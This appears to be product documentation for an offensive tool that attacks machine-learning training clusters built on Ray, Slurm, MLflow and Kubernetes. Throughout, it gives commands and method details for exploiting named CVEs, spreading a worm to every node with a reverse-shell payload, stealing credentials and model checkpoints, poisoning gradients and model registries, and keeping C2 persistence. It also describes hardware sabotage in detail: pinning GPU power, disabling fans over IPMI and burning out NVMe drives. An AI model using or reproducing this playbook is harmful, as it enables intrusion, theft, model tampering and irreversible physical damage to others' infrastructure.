SPECTER THUNDERBOLT is the NIGHTFALL framework's ML training cluster exploitation engine. It targets the full training infrastructure stack: Ray distributed compute, Slurm HPC schedulers, MLflow experiment tracking, Kubernetes GPU clusters, and the physical hardware layer. Eight subsystems cover passive cluster fingerprinting, initial access exploitation, cluster worm propagation, credential and data harvest, realtime gradient poisoning, three persistence mechanisms, hardware sabotage, and signed report generation.
The SPREAD subsystem delivers three worm vectors: Ray num_cpus=0 job floods all cluster nodes (CVE-2023-48022 CVSS 9.8), Slurm srun --nodelist=ALL executes across all partitions (CVE-2023-41915 CVSS 8.8), and a Kubernetes privileged DaemonSet deploys to every node. The DESTROY gate is required for SPREAD, CORRUPT (gradient injection), PERSIST (Ray/Slurm/K8s), and SABOTAGE. The release covers 3 CVEs, 5 WMD classes, and 288 tests.
# Install from PyPI
pip install specter-thunderbolt
# Or install from source
pip install -e /path/to/red-specter-specter-thunderbolt
# Verify
thunderbolt --version
Three gate levels control access to increasingly destructive capabilities. THUNDERBOLT introduces the DESTROY gate — a third tier beyond UNLEASHED requiring three simultaneous conditions.
| Gate | Operations | Requirement |
|---|---|---|
| OPEN | SURVEY (passive fingerprinting, platform detection) | None — passive recon only |
| INJECT | INFILTRATE, HARVEST, CORRUPT (registry), PERSIST (MLflow) | Ed25519-signed scope with ROE |
| DESTROY | SPREAD (worm), CORRUPT (gradient), PERSIST (Ray/Slurm/K8s), SABOTAGE | Signed ROE document + Ed25519 key + --confirm-physical-harm |
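The gate table can be read as a set of preconditions that must all hold before a command is allowed to run. The following is a minimal sketch of that check, not the tool's actual implementation: the names `Gate`, `GateContext`, and `missing_requirements` are hypothetical, and the only thing taken from the table is which requirement belongs to which gate.

```python
from dataclasses import dataclass
from enum import Enum


class Gate(Enum):
    OPEN = "open"
    INJECT = "inject"
    DESTROY = "destroy"


@dataclass(frozen=True)
class GateContext:
    """Hypothetical record of what the operator has supplied."""
    signed_scope: bool = False           # Ed25519-signed scope with ROE (INJECT)
    signed_roe: bool = False             # signed ROE document (DESTROY)
    ed25519_key: bool = False            # operator Ed25519 key (DESTROY)
    confirm_physical_harm: bool = False  # --confirm-physical-harm flag (DESTROY)


def missing_requirements(gate: Gate, ctx: GateContext) -> list[str]:
    """Return the requirements from the gate table that are not yet met."""
    if gate is Gate.OPEN:
        return []  # passive recon only, nothing required
    if gate is Gate.INJECT:
        return [] if ctx.signed_scope else ["signed scope with ROE"]
    # DESTROY: all three conditions must hold at the same time
    checks = [
        ("signed ROE document", ctx.signed_roe),
        ("Ed25519 key", ctx.ed25519_key),
        ("--confirm-physical-harm", ctx.confirm_physical_harm),
    ]
    return [name for name, ok in checks if not ok]
```

Returning the list of unmet conditions, rather than a single boolean, lets a caller report exactly which part of the DESTROY requirement is absent before refusing to proceed.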
thunderbolt infiltrate \
--target 10.0.0.1 \
--gate inject \
--operator "RED SPECTER PENTEST"
# DESTROY gate requires all three conditions
thunderbolt sabotage \
--target 10.0.0.1 \
--gate destroy \
--roe /path/to/signed-roe.json \
--confirm-physical-harm
| CVE | Component | Type | CVSS | Gate |
|---|---|---|---|---|
| CVE-2023-48022 | Ray | Unauthenticated RCE via dashboard API — no auth on default deployments | 9.8 CRITICAL | DESTROY |
| CVE-2024-1483 | MLflow | Path traversal in artifact store — arbitrary file read/write | 9.8 CRITICAL | INJECT |
| CVE-2023-41915 | Slurm | Prolog/epilog filesystem race — privilege escalation to root | 8.8 HIGH | DESTROY |
| Subsystem | Gate | CLI Command | Description |
|---|---|---|---|
| SURVEY | OPEN | thunderbolt survey --target <ip> | Platform fingerprint, CVE applicability, port sweep |
| INFILTRATE | INJECT | thunderbolt infiltrate --target <ip> --cve <id> | Initial access via CVE exploitation |
| SPREAD | DESTROY | thunderbolt spread --target <ip> --vector <ray\|slurm\|k8s> | Cluster worm propagation to all nodes |
| HARVEST | INJECT | thunderbolt harvest --target <ip> --mode <creds\|checkpoints\|data> | IAM key theft, checkpoint exfil, data manifest |
| CORRUPT | INJECT/DESTROY | thunderbolt corrupt --target <ip> --mode <registry\|gradient> | MLflow registry poison or realtime gradient injection |
| PERSIST | DESTROY | thunderbolt persist --target <ip> --mechanism <ray\|slurm\|k8s> | C2 polling job, self-resubmit, kube-system CronJob |
| SABOTAGE | DESTROY | thunderbolt sabotage --target <ip> --confirm-physical-harm | GPU power pin, IPMI fan 0%, SSD wear acceleration |
| REPORT | OPEN | thunderbolt report --target <ip> | Ed25519-signed TBT-{hex12} report generation |
The SPREAD subsystem delivers three worm vectors that achieve cluster-wide node compromise from a single entry point. All three require DESTROY gate. The worm payloads are configurable — default payload establishes reverse shell to C2; SABOTAGE mode adds hardware destruction to every worm-reached node.
Ray's dashboard API (default port 8265) accepts unauthenticated job submissions. THUNDERBOLT submits a Ray job with num_cpus=0 — this special resource requirement causes Ray to schedule the job on every available node simultaneously, achieving full cluster propagation in a single API call. The job payload executes on the Ray worker process (often root or a privileged service account) on all cluster nodes.
# Ray worm — propagates to all nodes via num_cpus=0 job submission
# CVE-2023-48022 CVSS 9.8 — no auth required on default Ray deployments
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json
# With SABOTAGE payload on each reached node
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json \
--payload sabotage --confirm-physical-harm
Slurm's prolog/epilog scripts run as root during job setup and teardown. CVE-2023-41915 is a symlink race condition in Slurm's job file handling that allows privilege escalation from a regular cluster user to root. Once root is obtained on the submit node, srun --nodelist=ALL --ntasks=[total_nodes] executes the payload on every node in every partition.
# Slurm privilege escalation + all-node worm
# CVE-2023-41915 CVSS 8.8 — symlink race in prolog/epilog
thunderbolt spread --target 10.0.0.1 --vector slurm \
--gate destroy --roe /path/to/signed-roe.json
On Kubernetes GPU clusters with misconfigured RBAC, THUNDERBOLT deploys a privileged DaemonSet to the kube-system namespace. DaemonSets are scheduled to every node in the cluster by design. The DaemonSet runs with hostPID, hostNetwork, and hostPath mounts, providing full node-level access from the Kubernetes API.
# Kubernetes privileged DaemonSet — every node in the cluster
thunderbolt spread --target 10.0.0.1:6443 --vector k8s \
--gate destroy --roe /path/to/signed-roe.json
All SABOTAGE operations require DESTROY gate, a signed ROE document, and --confirm-physical-harm. These operations cause irreversible hardware damage and cannot be undone once executed.
nvidia-smi -pm 1 enables persistent mode (survives process termination). nvidia-smi -pl [max_tdp] pins the power limit to the GPU's rated maximum TDP: A100 80GB SXM at 400W, H100 SXM5 at 700W, RTX 4090 at 450W. At maximum power with zero airflow (IPMI fan override active), junction temperature rises above safe operating range causing accelerated HBM electromigration and permanent memory cell damage.
Raw IPMI command sequence disables BMC fan control on Dell PowerEdge (iDRAC), HPE ProLiant (iLO), and Supermicro platforms. Requires BMC network access (IPMI LAN, port 623) and credentials — obtained via CVE-2023-41915 root escalation or from harvested configuration files. Zero RPM airflow causes ambient temperature rise of approximately 15-25°C per hour in a properly loaded GPU node.
Sequential write loop targets NVMe training storage (/dev/nvme* or mounted training filesystems). All cluster nodes execute simultaneously via the SPREAD worm. Combined write bandwidth of a 64-node cluster (each with 4x NVMe at ~7 GB/s) reaches ~1.8 TB/s aggregate write — exhausting enterprise NVMe endurance in hours rather than years.
| Mechanism | Platform | Survival | C2 Interval |
|---|---|---|---|
| Ray detached job | Ray | Cluster restart | Every 24 hours |
| Slurm self-resubmit | Slurm | Node reboot via --dependency=afternotok | On job completion/failure |
| K8s CronJob (kube-system) | Kubernetes | Pod eviction, namespace deletion protection | Every 6 hours |
| Class | Trigger | Gate |
|---|---|---|
| training_cluster_annihilation | Worm propagation reached all nodes via Ray/Slurm/K8s | DESTROY |
| realtime_gradient_poison | Adversarial gradients injected during active training run | DESTROY |
| model_ip_exfil | Model checkpoints extracted from MLflow or training filesystem | INJECT |
| training_infrastructure_pwn | Root on Slurm controller or K8s cluster-admin achieved | DESTROY |
| ml_pipeline_backdoor | Poisoned model registered as production in MLflow registry | INJECT |
# OPEN: fingerprint cluster, map attack surface
thunderbolt survey --target 10.0.0.1 --platform auto
# OPEN: scan CIDR range for exposed ML infrastructure
thunderbolt survey --cidr 10.0.0.0/24
# INJECT: MLflow path traversal — initial access
thunderbolt infiltrate --target 10.0.0.1 --cve CVE-2024-1483 --gate inject
# INJECT: harvest IAM credentials + model checkpoints
thunderbolt harvest --target 10.0.0.1 --mode all --gate inject
# INJECT: poison MLflow model registry
thunderbolt corrupt --target 10.0.0.1 --mode registry --gate inject
# DESTROY: Ray cluster worm — all nodes compromised
thunderbolt spread --target 10.0.0.1 --vector ray \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: realtime gradient injection during active training
thunderbolt corrupt --target 10.0.0.1 --mode gradient \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: establish Ray C2 persistence (24h poll)
thunderbolt persist --target 10.0.0.1 --mechanism ray \
--gate destroy --roe /path/to/signed-roe.json
# DESTROY: hardware sabotage — GPU pin + IPMI fan + SSD wear
thunderbolt sabotage --target 10.0.0.1 \
--gate destroy --roe /path/to/signed-roe.json \
--confirm-physical-harm
# Full annihilate (auto kill chain — DESTROY gate)
thunderbolt annihilate --target 10.0.0.1 \
--gate destroy --roe /path/to/signed-roe.json \
--confirm-physical-harm \
--output /tmp/specter-thunderbolt-results/
All reports are signed with the operator's Ed25519 key. Report IDs use the format TBT-{hex12} (12 random hexadecimal characters). Reports include:
| Field | Value |
|---|---|
| report_id | TBT-{hex12}, Ed25519-signed |
| risk_score | 0.0–1.0 (floored at 0.95 when a DESTROY-gated WMD class is confirmed) |
| wmd_classes | List of triggered WMD class IDs |
| cves_confirmed | Confirmed CVEs with CVSS scores |
| hardware_damage_assessment | GPU thermal damage probability, NVMe endurance depletion estimate, estimated replacement cost USD |
| mitre_atlas | AML.T0018 / AML.T0043 / AML.T0048 / AML.T0054 |
| owasp | LLM03 / LLM06 |
| financial_blast_radius | Training compute cost USD, model IP value estimate, hardware replacement cost |
| roe_hash | SHA-256 of signed ROE document (DESTROY operations only) |
| output_formats | JSON + Markdown |
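Three of the fields above are simple enough to illustrate directly: `report_id`, `risk_score`, and `roe_hash`. The sketch below uses only the Python standard library and rests on stated assumptions: that `hex12` means 12 hexadecimal characters, that the 0.95 floor applies after clamping the raw score to 0.0–1.0, and that `roe_hash` is the hex digest of the raw ROE file bytes. The function names are hypothetical, and Ed25519 signing is left out because it needs a third-party library.

```python
import hashlib
import secrets


def new_report_id() -> str:
    """Build an ID of the form TBT-{hex12} (assumed: 12 hex characters)."""
    return f"TBT-{secrets.token_hex(6)}"  # 6 random bytes -> 12 hex chars


def floored_risk_score(raw: float, destroy_class_confirmed: bool) -> float:
    """Clamp to 0.0-1.0, then apply the 0.95 floor if a DESTROY-gated class is confirmed."""
    score = min(max(raw, 0.0), 1.0)
    return max(score, 0.95) if destroy_class_confirmed else score


def roe_hash(roe_bytes: bytes) -> str:
    """SHA-256 hex digest of the signed ROE document's bytes."""
    return hashlib.sha256(roe_bytes).hexdigest()
```

For example, `floored_risk_score(0.4, True)` returns `0.95`, while `floored_risk_score(0.4, False)` returns `0.4`.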